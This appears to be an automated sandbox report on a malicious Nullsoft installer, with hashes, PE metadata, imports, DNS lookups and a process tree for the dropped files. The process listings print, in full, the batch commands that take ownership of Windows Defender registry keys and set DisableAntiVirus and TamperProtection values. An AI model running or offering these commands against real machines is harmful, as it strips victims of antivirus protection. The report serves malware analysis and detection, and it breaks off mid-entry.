                            SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                            MD5:EFE5769E37BA37CF4607CB9918639932
                            SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                            SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                            SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 21%
                            • Antivirus: Virustotal, Detection: 19%, Browse
                            Joe Sandbox View:
                            • Filename: Ptmhbplhxb.exe, Detection: malicious, Browse
                            • Filename: P196hUN2fw.exe, Detection: malicious, Browse
                            • Filename: e4.exe, Detection: malicious, Browse
                            • Filename: 2dOeahdsto.exe, Detection: malicious, Browse
                            • Filename: bQQHP9ciRL.exe, Detection: malicious, Browse
                            • Filename: DllHost.exe, Detection: malicious, Browse
                            • Filename: Fza7TPh6Z7.exe, Detection: malicious, Browse
                            • Filename: SAlxtNmHFR.exe, Detection: malicious, Browse
                            • Filename: BFSdrqaAvS.exe, Detection: malicious, Browse
                            • Filename: We7WnoqeXe.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\3Dut8dFCwD.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):616312
                            Entropy (8bit):6.302197712270286
                            Encrypted:false
                            SSDEEP:12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
                            MD5:1FB64FF73938F4A04E97E5E7BF3D618C
                            SHA1:AA0F7DB484D0C580533DEC0E9964A59588C3632B
                            SHA-256:4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
                            SHA-512:DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Joe Sandbox View:
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: Ptmhbplhxb.exe, Detection: malicious, Browse
                            • Filename: P196hUN2fw.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\3Dut8dFCwD.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):3.8201777744499874
                            Encrypted:false
                            SSDEEP:48:6isDgDtjQHbc6akyAnx2mMM4ife1QivkZZtMlDIra569FHpfbNtm:X1JQpjVfeT1+fzNt
                            MD5:6B1213639BC5FFC4F1AF8C17420D4B1F
                            SHA1:EE2D622099FB19A8ED7E1C6137F60AC86FA65486
                            SHA-256:1FA9E2264B4954F01A83F6A4E8BC7982516091E0FB0C6A2F6154FA87164148B7
                            SHA-512:03A81297F140B0428636452075C1465D895485268BA243B03562495A5FF46CD392EF8D1A13D0C738D2CF3B560D0EF73AFCC63F210B3BDBF4D931E2E204CF4498
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 5%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..e.........."...0..............'... ...@....@.. ....................................@..................................'..O....@.......................`......X&............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H........ ...............................................................0..$.......s............o.......,..o.......&..*.................... ........(....*BSJB............v2.0.50727......l.......#~..P...h...#Strings............#US.........#GUID...........#Blob...........G..........3....................................................................d.....8.......................k.....7.....P...........x.....V...........L.....^.S...5.......................'.=.....P ..........
                            Process:C:\Users\user\Desktop\3Dut8dFCwD.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):281
                            Entropy (8bit):5.066733139951878
                            Encrypted:false
                            SSDEEP:6:TMVBd1IGMfVymRMT4/0xFCqa7VNQA1Q7VJdfEyFRfyrhAW4QIm:TMHdGGsVymhs8rzcrfyW3xm
                            MD5:4E15196F1F466FB6200550D7F678BB9D
                            SHA1:F474593BCC3148464D6DE0E0D3DF58C76A9718AB
                            SHA-256:5C3A338369C8B23A7021732FB167AB0FCB3C4BE9B6EEC7A726C8D9875890CCC1
                            SHA-512:6B3E8C65D3ECCC1DBF32C957CDC0AB05E85680603ED43587194E93B4117292290085A14D1711872B1C6277159E50E409EEFDA813A13FC314A63BEC6DE2D95E43
                            Malicious:true
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true"> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup>..</configuration>..
                            Process:C:\Users\user\Desktop\3Dut8dFCwD.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):5.2959870663251625
                            Encrypted:false
                            SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                            MD5:B4579BC396ACE8CAFD9E825FF63FE244
                            SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                            SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                            SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\3Dut8dFCwD.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12767
                            Entropy (8bit):5.189808508831073
                            Encrypted:false
                            SSDEEP:192:lBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:QK
                            MD5:1ABF8067994181B1A38867BF6437F9D2
                            SHA1:D25E23848F65B85F0F21E9A0A69E4268B625ECA2
                            SHA-256:23BBB732FF55AB62DC8863A69626EF5655F60BF0D7B96FA2818A895E81283B40
                            SHA-512:6237826DE2FEAF63C2F1312680118474F9B60F5516A05E171743A09A088D7C9BFD06CE9DE17852E6F4C2DCB577814163621FF27B2A7BBB37F2A1AE130F64D882
                            Malicious:false
                            Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato
                            Process:C:\Users\user\Desktop\3Dut8dFCwD.exe
                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.655569464152001
                            Encrypted:false
                            SSDEEP:96:/uidPNKO2mkcQ7DBOrkB0kPkKXwF4dkd8Nue3qYMns1BjgtRQWWzNt:FIOu7DBOrkB0kPkKXwF4dkd8Nn34nUBR
                            MD5:7CB364701028767F8942CC3F8439F8F2
                            SHA1:D6BEDE2206B7042B4CAE32F416E1B43FFAC94238
                            SHA-256:A2716605F8DD1930808E6918DB670A3FE32287791862883DBABD26849B87B09E
                            SHA-512:3011B3D64F79280AB05DE9658C4F5A13F637AD2E79D5770CFAEB3AF6CB8C7A56B610DAD69FDF295112BE64CFB80E18F30BB1829EB3C0E549105F63D0E770DC13
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 1%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dK............"...0.............:-... ...@....@.. ....................................`..................................,..O....@.......................`......P,..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P!...............................................................0..V.........(....,Lr...p......%..{..........%..{..........%..{..........%. ]X..(..........(....*..(....*...0..Z.........}......}......}.............. ....}......(....-&..{....}......{....}......{....}.....*.*...0............(....,..{..........*.*..(....*BSJB............v4.0.30319......l.......#~..L.......#Strings.... ...$...#US.D.......#GUID...T.......#Blob...........W=.........3................#.......
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Entropy (8bit):7.975794911633562
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:3Dut8dFCwD.exe
                            File size:898'420 bytes
                            MD5:3f58da2e1652dddab53995166f24993f
                            SHA1:1721c19909c2309398d5174f9fcb2abcff51e862
                            SHA256:d14ee261ed6c5dddc1900587c455991defe0f49c1da1172d7f8f1e163309d3e8
                            SHA512:ece1950851e0724f465471cfd50021f0c13642f66753c56bb77c91e6db972032ce272286f2d51f5c87edb61b806cd8a21458286f8bd1b799821526966b10dca1
                            SSDEEP:24576:MGxOacf/CoFPz8s43+ae4Y9hJ9HFtMr6lLwLkM0VP90ef2:XxyCoZz943+YaJNFtM+5wL3AP912
                            TLSH:8B1523FEA3C9DC67D1E312700A5906750BD26E166D94883AE3933CC8B777742AB6D306
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L...Y..d.................h....:....
                            Icon Hash:202c38303420a0cd
                            Entrypoint:0x40350f
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x64A0DC59 [Sun Jul 2 02:09:29 2023 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                            Instruction
                            sub esp, 000003F8h
                            push ebp
                            push esi
                            push edi
                            push 00000020h
                            pop edi
                            xor ebp, ebp
                            push 00008001h
                            mov dword ptr [esp+20h], ebp
                            mov dword ptr [esp+18h], 0040A2D8h
                            mov dword ptr [esp+14h], ebp
                            call dword ptr [004080A4h]
                            mov esi, dword ptr [004080A8h]
                            lea eax, dword ptr [esp+34h]
                            push eax
                            mov dword ptr [esp+4Ch], ebp
                            mov dword ptr [esp+0000014Ch], ebp
                            mov dword ptr [esp+00000150h], ebp
                            mov dword ptr [esp+38h], 0000011Ch
                            call esi
                            test eax, eax
                            jne 00007FCC7CD1A38Ah
                            lea eax, dword ptr [esp+34h]
                            mov dword ptr [esp+34h], 00000114h
                            push eax
                            call esi
                            mov ax, word ptr [esp+48h]
                            mov ecx, dword ptr [esp+62h]
                            sub ax, 00000053h
                            add ecx, FFFFFFD0h
                            neg ax
                            sbb eax, eax
                            mov byte ptr [esp+0000014Eh], 00000004h
                            not eax
                            and eax, ecx
                            mov word ptr [esp+00000148h], ax
                            cmp dword ptr [esp+38h], 0Ah
                            jnc 00007FCC7CD1A358h
                            and word ptr [esp+42h], 0000h
                            mov eax, dword ptr [esp+40h]
                            movzx ecx, byte ptr [esp+3Ch]
                            mov dword ptr [007A8318h], eax
                            xor eax, eax
                            mov ah, byte ptr [esp+38h]
                            movzx eax, ax
                            or eax, ecx
                            xor ecx, ecx
                            mov ch, byte ptr [esp+00000148h]
                            movzx ecx, cx
                            shl eax, 10h
                            or eax, ecx
                            movzx ecx, byte ptr [esp+0000004Eh]
                            Programming Language:
                            • [EXP] VC++ 6.0 SP5 build 8804
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e00000x42a8.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x66b10x6800fc80ef3332ba3a0dd802b98a9723e67dFalse0.6719501201923077data6.466881320096335IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xa0000x39e3780x60089ffa2c22129e298ad6a3abf19eb19b0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .ndata0x3a90000x370000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x3e00000x42a80x44008fd15985020fbabc749233d6fb67da82False0.3312844669117647data5.175218885302942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0x3e01f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.3017634854771784
                            RT_ICON0x3e27980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.3651500938086304
                            RT_ICON0x3e38400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5336879432624113
                            RT_DIALOG0x3e3ca80x100dataEnglishUnited States0.5234375
                            RT_DIALOG0x3e3da80x11cdataEnglishUnited States0.6056338028169014
                            RT_DIALOG0x3e3ec80x60dataEnglishUnited States0.7291666666666666
                            RT_GROUP_ICON0x3e3f280x30dataEnglishUnited States0.8333333333333334
                            RT_MANIFEST0x3e3f580x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5517241379310345
                            DLLImport
                            ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                            SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                            ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                            COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                            USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                            GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                            KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 12, 2024 09:53:10.969609976 CEST1.1.1.1192.168.2.50xeacdNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Jul 12, 2024 09:53:10.969609976 CEST1.1.1.1192.168.2.50xeacdNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:03:52:52
                            Start date:12/07/2024
                            Path:C:\Users\user\Desktop\3Dut8dFCwD.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\3Dut8dFCwD.exe"
                            Imagebase:0x400000
                            File size:898'420 bytes
                            MD5 hash:3F58DA2E1652DDDAB53995166F24993F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:03:52:53
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:03:52:53
                            Start date:12/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:03:52:53
                            Start date:12/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
                            Wow64 process (32bit):false
                            Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
                            Imagebase:0x7ff697030000
                            File size:616'312 bytes
                            MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            • Detection: 0%, Virustotal, Browse
                            Reputation:low
                            Has exited:true

                            Target ID:5
                            Start time:03:52:54
                            Start date:12/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
                            Wow64 process (32bit):false
                            Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
                            Imagebase:0x7ff697030000
                            File size:616'312 bytes
                            MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:6
                            Start time:03:52:54
                            Start date:12/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
                            Wow64 process (32bit):false
                            Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
                            Imagebase:0x7ff697030000
                            File size:616'312 bytes
                            MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:7
                            Start time:03:52:54
                            Start date:12/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
                            Wow64 process (32bit):false
                            Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
                            Imagebase:0x7ff697030000
                            File size:616'312 bytes
                            MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:8
                            Start time:03:52:54
                            Start date:12/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
                            Wow64 process (32bit):false
                            Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
                            Imagebase:0x7ff697030000
                            File size:616'312 bytes
                            MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:9
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
                            Wow64 process (32bit):false
                            Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
                            Imagebase:0x7ff697030000
                            File size:616'312 bytes
                            MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:10
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
                            Wow64 process (32bit):false
                            Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
                            Imagebase:0x7ff697030000
                            File size:616'312 bytes
                            MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:11
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
                            Wow64 process (32bit):false
                            Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
                            Imagebase:0x7ff697030000
                            File size:616'312 bytes
                            MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:12
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:14
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
